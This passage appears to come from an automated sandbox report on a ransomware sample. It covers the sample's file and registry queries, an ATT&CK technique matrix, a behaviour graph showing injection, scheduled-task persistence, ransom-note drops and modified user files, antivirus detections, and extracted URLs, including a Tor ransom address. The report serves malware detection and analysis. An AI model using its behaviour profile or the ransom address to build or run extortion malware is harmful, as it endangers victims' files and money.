                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt VolumeInformation
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: IconCache.db.7.drBinary or memory string: \\192.168.2.1\all\procexp.exeA"c:\users\user\desktop\procexp.exe

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection112Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder11Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationProxy1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 548760 Sample: Mm7Yq5V7Lu Startdate: 06/01/2022 Architecture: WINDOWS Score: 100 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 Found ransom note / readme 2->72 74 6 other signatures 2->74 7 Mm7Yq5V7Lu.exe 6 2->7         started        11 Mm7Yq5V7Lu.exe 4 2->11         started        13 Mm7Yq5V7Lu.exe 4 2->13         started        15 2 other processes 2->15 process3 dnsIp4 62 C:\Users\user\AppData\Local\...\tmp3BD7.tmp, XML 7->62 dropped 64 C:\Users\user\AppData\...\Mm7Yq5V7Lu.exe.log, ASCII 7->64 dropped 78 Uses schtasks.exe or at.exe to add and modify task schedules 7->78 80 Injects a PE file into a foreign processes 7->80 18 Mm7Yq5V7Lu.exe 1 35 7->18         started        21 schtasks.exe 1 7->21         started        82 Multi AV Scanner detection for dropped file 11->82 84 Machine Learning detection for dropped file 11->84 23 Mm7Yq5V7Lu.exe 11->23         started        26 schtasks.exe 1 11->26         started        28 Mm7Yq5V7Lu.exe 11->28         started        30 Mm7Yq5V7Lu.exe 13->30         started        32 schtasks.exe 13->32         started        34 Mm7Yq5V7Lu.exe 13->34         started        36 2 other processes 13->36 66 192.168.2.1 unknown unknown 15->66 file5 signatures6 process7 file8 44 C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe, PE32 18->44 dropped 46 C:\read-me.txt, data 18->46 dropped 48 C:\Users\...\Mm7Yq5V7Lu.exe:Zone.Identifier, ASCII 18->48 dropped 50 C:\Users\Public\AccountPictures\read-me.txt, data 18->50 dropped 38 conhost.exe 21->38         started        52 C:\Users\user\Desktop\...IVQSAOTAQ.png, data 23->52 dropped 54 C:\Users\user\AppData\...\read-me.txt, data 23->54 dropped 40 conhost.exe 26->40         started        56 C:\Users\user\DesktopOWRVPQCCS.jpg, data 30->56 dropped 58 C:\Users\user\Desktop\...\BJZFPPWAPT.png, data 30->58 dropped 60 4 other files (2 malicious) 30->60 dropped 76 Modifies existing user documents (likely ransomware behavior) 30->76 42 conhost.exe 32->42         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Mm7Yq5V7Lu.exe30%VirustotalBrowse
                      Mm7Yq5V7Lu.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe35%ReversingLabsByteCode-MSIL.Trojan.Taskun

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      12.2.Mm7Yq5V7Lu.exe.2f078e4.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.Mm7Yq5V7Lu.exe.400000.6.unpack100%AviraHEUR/AGEN.1117723Download File
                      15.2.Mm7Yq5V7Lu.exe.400000.0.unpack100%AviraHEUR/AGEN.1117723Download File
                      23.0.Mm7Yq5V7Lu.exe.400000.4.unpack100%AviraHEUR/AGEN.1117723Download File
                      1.2.Mm7Yq5V7Lu.exe.2d578b4.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.Mm7Yq5V7Lu.exe.2a678e4.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.Mm7Yq5V7Lu.exe.400000.8.unpack100%AviraHEUR/AGEN.1117723Download File
                      23.2.Mm7Yq5V7Lu.exe.400000.0.unpack100%AviraHEUR/AGEN.1117723Download File
                      7.0.Mm7Yq5V7Lu.exe.400000.6.unpack100%AviraHEUR/AGEN.1117723Download File
                      15.0.Mm7Yq5V7Lu.exe.400000.4.unpack100%AviraHEUR/AGEN.1117723Download File
                      15.0.Mm7Yq5V7Lu.exe.400000.6.unpack100%AviraHEUR/AGEN.1117723Download File
                      7.2.Mm7Yq5V7Lu.exe.400000.0.unpack100%AviraHEUR/AGEN.1117723Download File
                      7.0.Mm7Yq5V7Lu.exe.400000.8.unpack100%AviraHEUR/AGEN.1117723Download File
                      15.0.Mm7Yq5V7Lu.exe.400000.8.unpack100%AviraHEUR/AGEN.1117723Download File
                      7.0.Mm7Yq5V7Lu.exe.400000.4.unpack100%AviraHEUR/AGEN.1117723Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://roaming.edog.0%URL Reputationsafe
                      https://cdn.entity.0%URL Reputationsafe
                      https://powerlift.acompli.net0%URL Reputationsafe
                      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                      https://cortana.ai0%URL Reputationsafe
                      http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV1%VirustotalBrowse
                      http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV0%Avira URL Cloudsafe
                      https://api.aadrm.com/0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                      https://store.office.cn/addinstemplate0%URL Reputationsafe
                      https://api.aadrm.com0%URL Reputationsafe
                      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                      https://www.odwebp.svc.ms0%URL Reputationsafe
                      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                      https://dataservice.o365filtering.com/0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                      https://ncus.contentsync.0%URL Reputationsafe
                      https://apis.live.net/v5.0/0%URL Reputationsafe
                      https://wus2.contentsync.0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.diagnosticssdf.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                        high
                        https://login.microsoftonline.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                          high
                          https://shell.suite.office.com:144325C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                            high
                            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                              high
                              https://autodiscover-s.outlook.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                high
                                https://roaming.edog.25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                • URL Reputation: safe
                                unknown
                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                  high
                                  https://cdn.entity.25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.addins.omex.office.net/appinfo/query25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                    high
                                    https://clients.config.office.net/user/v1.0/tenantassociationkey25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                      high
                                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                        high
                                        https://powerlift.acompli.net25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://rpsticket.partnerservices.getmicrosoftkey.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://lookup.onenote.com/lookup/geolocation/v125C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                          high
                                          https://cortana.ai25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designersMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.torproject.org/notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, read-me.txt27.7.dr, read-me.txt6.23.dr, read-me.txt7.7.dr, read-me.txt4.23.dr, read-me.txt24.7.dr, read-me.txt28.7.dr, read-me.txt4.7.dr, read-me.txt1.15.dr, read-me.txt30.7.dr, read-me.txt13.7.dr, read-me.txt14.7.dr, read-me.txt23.7.dr, read-me.txt.7.dr, read-me.txt11.7.dr, read-me.txt5.7.dr, read-me.txt25.7.dr, read-me.txt9.15.dr, read-me.txt2.23.dr, read-me.txt0.23.dr, read-me.txt3.15.dr, read-me.txt20.7.dr, read-me.txt16.7.dr, read-me.txt5.15.dr, read-me.txt1.7.dr, read-me.txt10.15.dr, read-me.txt8.15.dr, read-me.txt6.7.dr, read-me.txt18.7.dr, read-me.txt26.7.dr, read-me.txt0.15.dr, read-me.txt7.15.dr, read-me.txt15.7.dr, read-me.txt6.15.dr, read-me.txt1.23.dr, read-me.txt3.23.dr, read-me.txt5.23.dr, read-me.txt.23.dr, read-me.txt2.7.dr, read-me.txt8.7.dr, read-me.txt.15.dr, read-me.txt22.7.dr, read-me.txt12.7.dr, read-me.txt7.23.dr, read-me.txt0.7.dr, read-me.txt10.7.dr, read-me.txt9.7.dr, read-me.txt29.7.dr, read-me.txt3.7.dr, read-me.txt21.7.dr, read-me.txt4.15.dr, read-me.txt19.7.dr, read-me.txt2.15.dr, read-me.txt17.7.drfalse
                                              high
                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                high
                                                https://cloudfiles.onenote.com/upload.aspx25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                  high
                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                    high
                                                    https://entitlement.diagnosticssdf.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                      high
                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                        high
                                                        http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFVnotepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, read-me.txt27.7.dr, read-me.txt6.23.dr, read-me.txt7.7.dr, read-me.txt4.23.dr, read-me.txt24.7.dr, read-me.txt28.7.dr, read-me.txt4.7.dr, read-me.txt1.15.dr, read-me.txt30.7.dr, read-me.txt13.7.dr, read-me.txt14.7.dr, read-me.txt23.7.dr, read-me.txt.7.dr, read-me.txt11.7.dr, read-me.txt5.7.dr, read-me.txt25.7.dr, read-me.txt9.15.dr, read-me.txt2.23.dr, read-me.txt0.23.dr, read-me.txt3.15.dr, read-me.txt20.7.dr, read-me.txt16.7.dr, read-me.txt5.15.dr, read-me.txt1.7.dr, read-me.txt10.15.dr, read-me.txt8.15.dr, read-me.txt6.7.dr, read-me.txt18.7.dr, read-me.txt26.7.dr, read-me.txt0.15.dr, read-me.txt7.15.dr, read-me.txt15.7.dr, read-me.txt6.15.dr, read-me.txt1.23.dr, read-me.txt3.23.dr, read-me.txt5.23.dr, read-me.txt.23.dr, read-me.txt2.7.dr, read-me.txt8.7.dr, read-me.txt.15.dr, read-me.txt22.7.dr, read-me.txt12.7.dr, read-me.txt7.23.dr, read-me.txt0.7.dr, read-me.txt10.7.dr, read-me.txt9.7.dr, read-me.txt29.7.dr, read-me.txt3.7.dr, read-me.txt21.7.dr, read-me.txt4.15.dr, read-me.txt19.7.dr, read-me.txt2.15.dr, read-me.txt17.7.drtrue
                                                        • 1%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.aadrm.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.comMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ofcrecsvcapi-int.azurewebsites.net/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cn/cTheMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                          high
                                                          https://api.microsoftstream.com/api/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                            high
                                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                              high
                                                              https://cr.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                high
                                                                http://www.galapagosdesign.com/DPleaseMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                http://www.urwpp.deDPleaseMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://portal.office.com/account/?ref=ClientMeControl25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMm7Yq5V7Lu.exe, 00000001.00000002.331874084.0000000002C21000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000A.00000002.389216756.0000000002931000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000C.00000002.419056283.0000000002DD1000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://graph.ppe.windows.net25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                      high
                                                                      https://res.getmicrosoftkey.com/api/redemptionevents25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://powerlift-frontdesk.acompli.net25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://tasks.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                        high
                                                                        https://officeci.azurewebsites.net/api/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/work25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                          high
                                                                          https://store.office.cn/addinstemplate25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.aadrm.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                            high
                                                                            https://globaldisco.crm.dynamics.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                              high
                                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                high
                                                                                https://dev0-api.acompli.net/autodetect25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.odwebp.svc.ms25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://api.powerbi.com/v1.0/myorg/groups25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                  high
                                                                                  https://web.microsoftstream.com/video/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                    high
                                                                                    https://api.addins.store.officeppe.com/addinstemplate25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://graph.windows.net25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                      high
                                                                                      https://dataservice.o365filtering.com/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://en.wMm7Yq5V7Lu.exe, 00000001.00000003.302536100.00000000012FD000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://officesetup.getmicrosoftkey.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://analysis.windows.net/powerbi/api25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                        high
                                                                                        http://www.carterandcone.comlMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://prod-global-autodetect.acompli.net/autodetect25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.fontbureau.com/designers/frere-jones.htmlMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://outlook.office365.com/autodiscover/autodiscover.json25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                            high
                                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                              high
                                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                high
                                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                  high
                                                                                                  https://ncus.contentsync.25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                    high
                                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                      high
                                                                                                      http://weather.service.msn.com/data.aspx25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                        high
                                                                                                        https://apis.live.net/v5.0/25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                          high
                                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                              high
                                                                                                              https://management.azure.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                  high
                                                                                                                  http://www.fontbureau.com/designersGMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://wus2.contentsync.25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://incidents.diagnostics.office.com25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                      high
                                                                                                                      http://www.fontbureau.com/designers/?Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.founder.com.cn/cn/bTheMm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://clients.config.office.net/user/v1.0/ios25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
                                                                                                                          high
                                                                                                                          http://www.fontbureau.com/designers?Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/odc/insertmedia25C835F8-92DB-4E87-B21B-07E593442637.18.drfalse
